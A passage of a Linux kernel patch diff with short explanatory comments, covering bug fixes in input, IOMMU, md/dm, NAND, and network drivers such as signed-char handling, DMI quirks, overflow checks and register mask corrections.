+ 
+-	y_pitch = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_pitch = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_pitch = 36 + 2 * y_pitch; /* In 0.1 mm units */
+ 
+ 	reg = alps_command_mode_read_reg(psmouse, reg_pitch + 1);
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_electrode = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_electrode = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_electrode = 17 + x_electrode;
+ 
+-	y_electrode = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_electrode = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_electrode = 13 + y_electrode;
+ 
+ 	x_phys = x_pitch * (x_electrode - 1); /* In 0.1 mm units */
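The (char) -> (s8) conversions in the two ALPS hunks above are more than style: the signedness of plain char is implementation-defined, and it is unsigned by default on several architectures the kernel supports (ARM, for example), so (char)x silently stops sign-extending there and the relative-motion arithmetic breaks. A minimal userspace sketch of the difference, assuming only standard C:

	#include <stdio.h>
	#include <stdint.h>

	typedef int8_t s8;	/* stand-in for the kernel's s8 */

	int main(void)
	{
		unsigned int x = 0xF0;	/* raw 8-bit motion field from a packet */

		/* (char)x is -16 where char is signed but 240 where it is
		 * unsigned; (s8)x is -16 on every ABI, which is what the
		 * trackpoint delta math requires.
		 */
		printf("(s8)x = %d\n", (int)(s8)x);
		return 0;
	}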
+diff --git a/drivers/input/mouse/focaltech.c b/drivers/input/mouse/focaltech.c
+index 6fd5fff0cbfff..c74b99077d16a 100644
+--- a/drivers/input/mouse/focaltech.c
++++ b/drivers/input/mouse/focaltech.c
+@@ -202,8 +202,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	state->pressed = packet[0] >> 7;
+ 	finger1 = ((packet[0] >> 4) & 0x7) - 1;
+ 	if (finger1 < FOC_MAX_FINGERS) {
+-		state->fingers[finger1].x += (char)packet[1];
+-		state->fingers[finger1].y += (char)packet[2];
++		state->fingers[finger1].x += (s8)packet[1];
++		state->fingers[finger1].y += (s8)packet[2];
+ 	} else {
+ 		psmouse_err(psmouse, "First finger in rel packet invalid: %d\n",
+ 			    finger1);
+@@ -218,8 +218,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	 */
+ 	finger2 = ((packet[3] >> 4) & 0x7) - 1;
+ 	if (finger2 < FOC_MAX_FINGERS) {
+-		state->fingers[finger2].x += (char)packet[4];
+-		state->fingers[finger2].y += (char)packet[5];
++		state->fingers[finger2].x += (s8)packet[4];
++		state->fingers[finger2].y += (s8)packet[5];
+ 	}
+ }
+ 
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index efc61736099b9..028e45bd050bf 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -610,6 +610,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook A574/H */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "FMVA0501PZ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+@@ -1116,6 +1124,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However both are required for the keyboard to not fail
++		 * completely sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "N150CU"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NH5xAx"),
+@@ -1123,6 +1145,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However both are required for the keyboard to not fail
++		 * completely sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NHxxRZQ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NL5xRU"),
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index 8a0a8078de8f7..2e502fcb0d1fd 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -124,10 +124,18 @@ static const unsigned long goodix_irq_flags[] = {
+ static const struct dmi_system_id nine_bytes_report[] = {
+ #if defined(CONFIG_DMI) && defined(CONFIG_X86)
+ 	{
+-		.ident = "Lenovo YogaBook",
+-		/* YB1-X91L/F and YB1-X90L/F */
++		/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9")
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		}
++	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		}
+ 	},
+ #endif
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index b00a0ceb2d137..c80c524ad32d7 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1057,7 +1057,8 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ 	}
+ 
+ 	err = -EINVAL;
+-	if (cap_sagaw(iommu->cap) == 0) {
++	if (!cap_sagaw(iommu->cap) &&
++	    (!ecap_smts(iommu->ecap) || ecap_slts(iommu->ecap))) {
+ 		pr_info("%s: No supported address widths. Not attempting DMA translation.\n",
+ 			iommu->name);
+ 		drhd->ignored = 1;
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index fc953013ea260..1b6c3c783a8eb 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -1509,6 +1509,8 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		ret = 1;
+ 		break;
+ 	default:
++		if (len)
++			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+ 		alloc_multiple_bios(&blist, ci, ti, num_bios);
+ 		while ((clone = bio_list_pop(&blist))) {
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 272cc5d14906f..beab84f0c585c 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -3131,6 +3131,9 @@ slot_store(struct md_rdev *rdev, const char *buf, size_t len)
+ 		err = kstrtouint(buf, 10, (unsigned int *)&slot);
+ 		if (err < 0)
+ 			return err;
++		if (slot < 0)
++			/* overflow */
++			return -ENOSPC;
+ 	}
+ 	if (rdev->mddev->pers && slot == -1) {
+ 		/* Setting 'slot' on an active array requires also
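The new slot < 0 check closes an overflow hole: slot is an int, but the sysfs value is parsed with kstrtouint() through a cast, so a string like "4294967295" parses successfully and then wraps to -1 -- which this function otherwise treats as the special "remove from array" request. A userspace analog of the wrap, assuming ordinary two's-complement behaviour:

	#include <stdio.h>
	#include <stdlib.h>

	int main(void)
	{
		int slot;
		unsigned int u = (unsigned int)strtoul("4294967295", NULL, 10);

		slot = (int)u;	/* wraps to -1, i.e. looks like "no slot" */
		if (slot < 0)	/* the added guard rejects the wrap */
			fprintf(stderr, "overflow: rejecting\n");
		return 0;
	}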
+diff --git a/drivers/media/platform/qcom/venus/firmware.c b/drivers/media/platform/qcom/venus/firmware.c
+index 142d4c74017c0..d59ecf776715c 100644
+--- a/drivers/media/platform/qcom/venus/firmware.c
++++ b/drivers/media/platform/qcom/venus/firmware.c
+@@ -38,8 +38,8 @@ static void venus_reset_cpu(struct venus_core *core)
+ 	writel(fw_size, wrapper_base + WRAPPER_FW_END_ADDR);
+ 	writel(0, wrapper_base + WRAPPER_CPA_START_ADDR);
+ 	writel(fw_size, wrapper_base + WRAPPER_CPA_END_ADDR);
+-	writel(0, wrapper_base + WRAPPER_NONPIX_START_ADDR);
+-	writel(0, wrapper_base + WRAPPER_NONPIX_END_ADDR);
++	writel(fw_size, wrapper_base + WRAPPER_NONPIX_START_ADDR);
++	writel(fw_size, wrapper_base + WRAPPER_NONPIX_END_ADDR);
+ 
+ 	if (IS_V6(core)) {
+ 		/* Bring XTSS out of reset */
+diff --git a/drivers/mtd/nand/ecc-mxic.c b/drivers/mtd/nand/ecc-mxic.c
+index 8afdca731b874..6b487ffe2f2dc 100644
+--- a/drivers/mtd/nand/ecc-mxic.c
++++ b/drivers/mtd/nand/ecc-mxic.c
+@@ -429,6 +429,7 @@ static int mxic_ecc_data_xfer_wait_for_completion(struct mxic_ecc_engine *mxic)
+ 		mxic_ecc_enable_int(mxic);
+ 		ret = wait_for_completion_timeout(&mxic->complete,
+ 						  msecs_to_jiffies(1000));
++		ret = ret ? 0 : -ETIMEDOUT;
+ 		mxic_ecc_disable_int(mxic);
+ 	} else {
+ 		ret = readl_poll_timeout(mxic->regs + INTRPT_STS, val,
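The added "ret = ret ? 0 : -ETIMEDOUT;" line exists because wait_for_completion_timeout() does not return an errno: it returns 0 on timeout and the number of jiffies remaining otherwise, so the old code propagated a large positive value on success and 0 on failure. A hedged sketch of the normalization idiom, using a hypothetical helper name:

	#include <errno.h>

	/* Fold the "jiffies remaining" convention into 0 / -errno. */
	static inline int remaining_to_errno(unsigned long remaining)
	{
		return remaining ? 0 : -ETIMEDOUT;
	}

	int main(void)
	{
		return remaining_to_errno(0) == -ETIMEDOUT ? 0 : 1;
	}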
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 5ee01231ac4cd..a28574c009003 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -176,6 +176,7 @@ struct meson_nfc {
+ 
+ 	dma_addr_t daddr;
+ 	dma_addr_t iaddr;
++	u32 info_bytes;
+ 
+ 	unsigned long assigned_cs;
+ };
+@@ -503,6 +504,7 @@ static int meson_nfc_dma_buffer_setup(struct nand_chip *nand, void *databuf,
+ 					 nfc->daddr, datalen, dir);
+ 			return ret;
+ 		}
++		nfc->info_bytes = infolen;
+ 		cmd = GENCMDIADDRL(NFC_CMD_AIL, nfc->iaddr);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+@@ -520,8 +522,10 @@ static void meson_nfc_dma_buffer_release(struct nand_chip *nand,
+ 	struct meson_nfc *nfc = nand_get_controller_data(nand);
+ 
+ 	dma_unmap_single(nfc->dev, nfc->daddr, datalen, dir);
+-	if (infolen)
++	if (infolen) {
+ 		dma_unmap_single(nfc->dev, nfc->iaddr, infolen, dir);
++		nfc->info_bytes = 0;
++	}
+ }
+ 
+ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+@@ -710,6 +714,8 @@ static void meson_nfc_check_ecc_pages_valid(struct meson_nfc *nfc,
+ 		usleep_range(10, 15);
+ 		/* info is updated by nfc dma engine */
+ 		smp_rmb();
++		dma_sync_single_for_cpu(nfc->dev, nfc->iaddr, nfc->info_bytes,
++					DMA_FROM_DEVICE);
+ 		ret = *info & ECC_COMPLETE;
+ 	} while (!ret);
+ }
+@@ -991,7 +997,7 @@ static const struct mtd_ooblayout_ops meson_ooblayout_ops = {
+ 
+ static int meson_nfc_clk_init(struct meson_nfc *nfc)
+ {
+-	struct clk_parent_data nfc_divider_parent_data[1];
++	struct clk_parent_data nfc_divider_parent_data[1] = {0};
+ 	struct clk_init_data init = {0};
+ 	int ret;
+ 
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index 003b0ac2854c9..3fffd5da8d3b0 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -958,15 +958,14 @@ int ksz8_fdb_dump(struct ksz_device *dev, int port,
+ 	u16 entries = 0;
+ 	u8 timestamp = 0;
+ 	u8 fid;
+-	u8 member;
+-	struct alu_struct alu;
++	u8 src_port;
++	u8 mac[ETH_ALEN];
+ 
+ 	do {
+-		alu.is_static = false;
+-		ret = ksz8_r_dyn_mac_table(dev, i, alu.mac, &fid, &member,
++		ret = ksz8_r_dyn_mac_table(dev, i, mac, &fid, &src_port,
+ 					   &timestamp, &entries);
+-		if (!ret && (member & BIT(port))) {
+-			ret = cb(alu.mac, alu.fid, alu.is_static, data);
++		if (!ret && port == src_port) {
++			ret = cb(mac, fid, false, data);
+ 			if (ret)
+ 				break;
+ 		}
+diff --git a/drivers/net/dsa/microchip/ksz8863_smi.c b/drivers/net/dsa/microchip/ksz8863_smi.c
+index 2f4623f3bd852..3698112138b78 100644
+--- a/drivers/net/dsa/microchip/ksz8863_smi.c
++++ b/drivers/net/dsa/microchip/ksz8863_smi.c
+@@ -82,22 +82,16 @@ static const struct regmap_bus regmap_smi[] = {
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+-		.max_raw_read = 1,
+-		.max_raw_write = 1,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 2,
+-		.max_raw_write = 2,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 4,
+-		.max_raw_write = 4,
+ 	}
+ };
+ 
+@@ -108,7 +102,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 8,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -118,7 +111,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 16,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -128,7 +120,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 32,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	}
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 19cd05762ab77..8601a9e4e4d2f 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -395,13 +395,13 @@ static const u32 ksz8863_masks[] = {
+ 	[VLAN_TABLE_VALID]		= BIT(19),
+ 	[STATIC_MAC_TABLE_VALID]	= BIT(19),
+ 	[STATIC_MAC_TABLE_USE_FID]	= BIT(21),
+-	[STATIC_MAC_TABLE_FID]		= GENMASK(29, 26),
++	[STATIC_MAC_TABLE_FID]		= GENMASK(25, 22),
+ 	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(20),
+ 	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(18, 16),
+-	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(5, 0),
+-	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(7),
++	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(1, 0),
++	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(2),
+ 	[DYNAMIC_MAC_TABLE_NOT_READY]	= BIT(7),
+-	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 28),
++	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 24),
+ 	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(19, 16),
+ 	[DYNAMIC_MAC_TABLE_SRC_PORT]	= GENMASK(21, 20),
+ 	[DYNAMIC_MAC_TABLE_TIMESTAMP]	= GENMASK(23, 22),
+@@ -411,10 +411,10 @@ static u8 ksz8863_shifts[] = {
+ 	[VLAN_TABLE_MEMBERSHIP_S]	= 16,
+ 	[STATIC_MAC_FWD_PORTS]		= 16,
+ 	[STATIC_MAC_FID]		= 22,
+-	[DYNAMIC_MAC_ENTRIES_H]		= 3,
++	[DYNAMIC_MAC_ENTRIES_H]		= 8,
+ 	[DYNAMIC_MAC_ENTRIES]		= 24,
+ 	[DYNAMIC_MAC_FID]		= 16,
+-	[DYNAMIC_MAC_TIMESTAMP]		= 24,
++	[DYNAMIC_MAC_TIMESTAMP]		= 22,
+ 	[DYNAMIC_MAC_SRC_PORT]		= 20,
+ };
+ 
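The corrected masks and shifts above are GENMASK()-built bitfield descriptors; when the bit bounds are wrong, reads land on neighbouring fields and dynamic MAC table dumps come back scrambled, which is what the old KSZ8863 values caused. A userspace sketch of the extraction pattern, with GENMASK() re-declared here as an assumed stand-in for the kernel macro:

	#include <stdio.h>
	#include <stdint.h>

	#define GENMASK(h, l)	(((~0u) << (l)) & (~0u >> (31 - (h))))

	int main(void)
	{
		uint32_t word = 0x00C00000;		/* bits 23:22 set */
		uint32_t mask = GENMASK(23, 22);	/* timestamp field */

		/* mask == 0x00C00000; shift by the field's low bit */
		printf("timestamp = %u\n", (word & mask) >> 22);	/* prints 3 */
		return 0;
	}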
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 89829e0ca8e8f..8211a4d373e81 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3354,9 +3354,14 @@ static int mv88e6xxx_setup_port(struct mv88e6xxx_chip *chip, int port)
+ 	 * If this is the upstream port for this switch, enable
+ 	 * forwarding of unknown unicasts and multicasts.
+ 	 */
+-	reg = MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP |
+-		MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
++	reg = MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
+ 		MV88E6XXX_PORT_CTL0_STATE_FORWARDING;
++	/* Forward any IPv4 IGMP or IPv6 MLD frames received
++	 * by a USER port to the CPU port to allow snooping.
++	 */
++	if (dsa_is_user_port(ds, port))
++		reg |= MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP;
++
+ 	err = mv88e6xxx_port_write(chip, port, MV88E6XXX_PORT_CTL0, reg);
+ 	if (err)
+ 		return err;
+diff --git a/drivers/net/dsa/realtek/realtek-mdio.c b/drivers/net/dsa/realtek/realtek-mdio.c
+index 3e54fac5f9027..5a8fe707ca25e 100644
+--- a/drivers/net/dsa/realtek/realtek-mdio.c
++++ b/drivers/net/dsa/realtek/realtek-mdio.c
+@@ -21,6 +21,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/of_device.h>
++#include <linux/overflow.h>
+ #include <linux/regmap.h>
+ 
+ #include "realtek.h"
+@@ -152,7 +153,9 @@ static int realtek_mdio_probe(struct mdio_device *mdiodev)
+ 	if (!var)
+ 		return -EINVAL;
+ 
+-	priv = devm_kzalloc(&mdiodev->dev, sizeof(*priv), GFP_KERNEL);
++	priv = devm_kzalloc(&mdiodev->dev,
++			    size_add(sizeof(*priv), var->chip_data_sz),
++			    GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
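The probe above grows the allocation to sizeof(*priv) plus a variant-specific chip_data area, and it does so with size_add() from the newly included <linux/overflow.h>: on overflow, size_add() saturates at SIZE_MAX, so the allocation fails outright instead of silently under-allocating. A userspace stand-in showing the saturating behaviour (the kernel version is built on overflow-checked addition, not this exact body):

	#include <stdio.h>
	#include <stdint.h>

	/* Assumed stand-in for the kernel's size_add(). */
	static size_t size_add(size_t a, size_t b)
	{
		size_t sum = a + b;

		return sum < a ? SIZE_MAX : sum;
	}

	int main(void)
	{
		printf("%zu\n", size_add(16, 32));	/* 48 */
		printf("%zu\n", size_add(SIZE_MAX, 1));	/* SIZE_MAX, not 0 */
		return 0;
	}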
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+index 16c490692f422..12083b9679b54 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+@@ -672,6 +672,18 @@ static int bnx2x_fill_frag_skb(struct bnx2x *bp, struct bnx2x_fastpath *fp,
+ 	return 0;
+ }
+ 
++static struct sk_buff *
++bnx2x_build_skb(const struct bnx2x_fastpath *fp, void *data)
++{
++	struct sk_buff *skb;
++
++	if (fp->rx_frag_size)
++		skb = build_skb(data, fp->rx_frag_size);
++	else
++		skb = slab_build_skb(data);
++	return skb;
++}
++
+ static void bnx2x_frag_free(const struct bnx2x_fastpath *fp, void *data)
+ {
+ 	if (fp->rx_frag_size)
+@@ -779,7 +791,7 @@ static void bnx2x_tpa_stop(struct bnx2x *bp, struct bnx2x_fastpath *fp,
+ 	dma_unmap_single(&bp->pdev->dev, dma_unmap_addr(rx_buf, mapping),
+ 			 fp->rx_buf_size, DMA_FROM_DEVICE);
+ 	if (likely(new_data))
+-		skb = build_skb(data, fp->rx_frag_size);
++		skb = bnx2x_build_skb(fp, data);
+ 
+ 	if (likely(skb)) {
+ #ifdef BNX2X_STOP_ON_ERROR
+@@ -1046,7 +1058,7 @@ static int bnx2x_rx_int(struct bnx2x_fastpath *fp, int budget)
+ 						 dma_unmap_addr(rx_buf, mapping),
+ 						 fp->rx_buf_size,
+ 						 DMA_FROM_DEVICE);
+-				skb = build_skb(data, fp->rx_frag_size);
++				skb = bnx2x_build_skb(fp, data);
+ 				if (unlikely(!skb)) {
+ 					bnx2x_frag_free(fp, data);
+ 					bnx2x_fp_qstats(bp, fp)->
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index b44b2ec5e61a2..015b5848b9583 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -175,12 +175,12 @@ static const struct pci_device_id bnxt_pci_tbl[] = {
+ 	{ PCI_VDEVICE(BROADCOM, 0x1750), .driver_data = BCM57508 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1751), .driver_data = BCM57504 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1752), .driver_data = BCM57502 },
+-	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1801), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57502_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1804), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57502_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57508_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd802), .driver_data = BCM58802 },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd804), .driver_data = BCM58804 },
+ #ifdef CONFIG_BNXT_SRIOV
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 56355e64815e2..3056e5bb7d6fa 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -1225,6 +1225,7 @@ struct bnxt_link_info {
+ #define BNXT_LINK_SPEED_40GB	PORT_PHY_QCFG_RESP_LINK_SPEED_40GB
+ #define BNXT_LINK_SPEED_50GB	PORT_PHY_QCFG_RESP_LINK_SPEED_50GB
+ #define BNXT_LINK_SPEED_100GB	PORT_PHY_QCFG_RESP_LINK_SPEED_100GB
++#define BNXT_LINK_SPEED_200GB	PORT_PHY_QCFG_RESP_LINK_SPEED_200GB
+ 	u16			support_speeds;
+ 	u16			support_pam4_speeds;
+ 	u16			auto_link_speeds;	/* fw adv setting */
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index ec573127b7076..6bd18eb5137f4 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -1714,6 +1714,8 @@ u32 bnxt_fw_to_ethtool_speed(u16 fw_link_speed)
+ 		return SPEED_50000;
+ 	case BNXT_LINK_SPEED_100GB:
+ 		return SPEED_100000;
++	case BNXT_LINK_SPEED_200GB:
++		return SPEED_200000;
+ 	default:
+ 		return SPEED_UNKNOWN;
+ 	}
+@@ -3738,6 +3740,7 @@ static void bnxt_self_test(struct net_device *dev, struct ethtool_test *etest,
+ 		bnxt_ulp_stop(bp);
+ 		rc = bnxt_close_nic(bp, true, false);
+ 		if (rc) {
++			etest->flags |= ETH_TEST_FL_FAILED;
+ 			bnxt_ulp_start(bp, rc);
+ 			return;
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ef4d3762bf371..ca229b0efeb65 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -44,7 +44,7 @@ static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+ 	return 0;
+ }
+ 
+-struct i40e_diag_reg_test_info i40e_reg_list[] = {
++const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+ 	/* offset               mask         elements   stride */
+ 	{I40E_QTX_CTL(0),       0x0000FFBF, 1,
+ 		I40E_QTX_CTL(1) - I40E_QTX_CTL(0)},
+@@ -78,27 +78,28 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+ 	i40e_status ret_code = 0;
+ 	u32 reg, mask;
++	u32 elements;
+ 	u32 i, j;
+ 
+ 	for (i = 0; i40e_reg_list[i].offset != 0 &&
+ 					     !ret_code; i++) {
+ 
++		elements = i40e_reg_list[i].elements;
+ 		/* set actual reg range for dynamically allocated resources */
+ 		if (i40e_reg_list[i].offset == I40E_QTX_CTL(0) &&
+ 		    hw->func_caps.num_tx_qp != 0)
+-			i40e_reg_list[i].elements = hw->func_caps.num_tx_qp;
++			elements = hw->func_caps.num_tx_qp;
+ 		if ((i40e_reg_list[i].offset == I40E_PFINT_ITRN(0, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(1, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(2, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_TQCTL(0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_RQCTL(0)) &&
+ 		    hw->func_caps.num_msix_vectors != 0)
+-			i40e_reg_list[i].elements =
+-				hw->func_caps.num_msix_vectors - 1;
++			elements = hw->func_caps.num_msix_vectors - 1;
+ 
+ 		/* test register access */
+ 		mask = i40e_reg_list[i].mask;
+-		for (j = 0; j < i40e_reg_list[i].elements && !ret_code; j++) {
++		for (j = 0; j < elements && !ret_code; j++) {
+ 			reg = i40e_reg_list[i].offset +
+ 			      (j * i40e_reg_list[i].stride);
+ 			ret_code = i40e_diag_reg_pattern_test(hw, reg, mask);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index c3340f320a18c..1db7c6d572311 100644
